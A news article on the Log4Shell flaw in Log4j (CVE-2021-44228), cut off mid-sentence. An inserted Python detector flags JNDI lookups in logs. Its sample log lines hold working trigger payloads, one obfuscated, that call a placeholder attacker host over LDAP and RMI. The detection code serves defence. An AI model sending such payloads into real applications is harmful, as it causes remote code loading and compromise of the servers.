“Worst-Case Scenario” Log4j Exploit Travels the Globe


Security teams across the globe have been scrambling to address a dangerous new zero-day vulnerability in a popular Apache logging system currently being exploited in the wild.



Dubbed 'Log4Shell,' the bug is found in the Log4j Java-based logging library and can lead to relatively straightforward remote code execution, which would allow attackers to deploy malware on a targeted server.



The exploit is dangerous for two reasons. First, Log4j is used by applications and platforms found all over the internet, including Minecraft, Apple iCloud, Tesla, Cloudflare and Elasticsearch. Second, it’s relatively easy to exploit: an attacker only has to force a vulnerable application to log a particular string of characters.



That could be done in a variety of ways as apps log many different types of events. According to one researcher, Minecraft servers were exploited simply by typing a short message into the chat box.
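Because the trigger arrives through whatever the application logs (HTTP headers, chat messages, usernames), the practical defensive step is to look for the Log4j lookup syntax in existing logs. The following is an added example, not code from the article or from Sophos: it scans constructed sample log lines for the `${jndi:` lookup, first collapsing the nested lookups (such as `${lower:j}`) that defeat a plain substring search. Hostnames and log entries are made up for the demonstration.

```python
import re

# Constructed sample log lines (not taken from the article); attacker.example is a placeholder.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://attacker.example/b}"',
    'chat: hello world',
]

# Innermost Log4j lookups that resolve to a literal: ${lower:x}, ${upper:x} and the
# default-value form ${...:-x}. Resolving these repeatedly yields the plain trigger text.
_INNER_LOOKUP = re.compile(r'\$\{(?:lower|upper):([^${}]+)\}|\$\{[^${}]*:-([^${}]*)\}')

# The Log4Shell trigger itself: a JNDI lookup embedded in logged data.
_JNDI_TRIGGER = re.compile(r'\$\{\s*jndi\s*:')


def normalize(text):
    """Collapse nested lookups until nothing changes, then lower-case for matching."""
    prev = None
    while prev != text:
        prev = text
        text = _INNER_LOOKUP.sub(lambda m: (m.group(1) or m.group(2)).lower(), text)
    return text.lower()


def is_log4shell_probe(line):
    """True if the log line contains a (possibly disguised) JNDI lookup."""
    return _JNDI_TRIGGER.search(normalize(line)) is not None


def scan_log(lines):
    """Return (line_number, normalized_text) for every flagged entry."""
    return [(n, normalize(line)) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for n, text in scan_log(SAMPLE_LOG_LINES):
        print(f"line {n}: {text}")
```

A hit means the string reached a log sink, not that the lookup succeeded; patched Log4j versions and outbound-LDAP/RMI blocking decide whether the probe did anything.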



Sophos has posted a detailed write-up of the underlying improper input validation flaw: CVE-2021-44228.



The impact of this discovery could dominate the work of cybersecurity professionals over the coming weeks.



According to Sophos senior threat researcher Sean Gallagher, Log4Shell has already been exploited to install coin miners, expose AWS keys, and install remote access tools, including Cobalt Strike, in victim environments.



“Log4Shell is a library that is used by many products. It can th ..
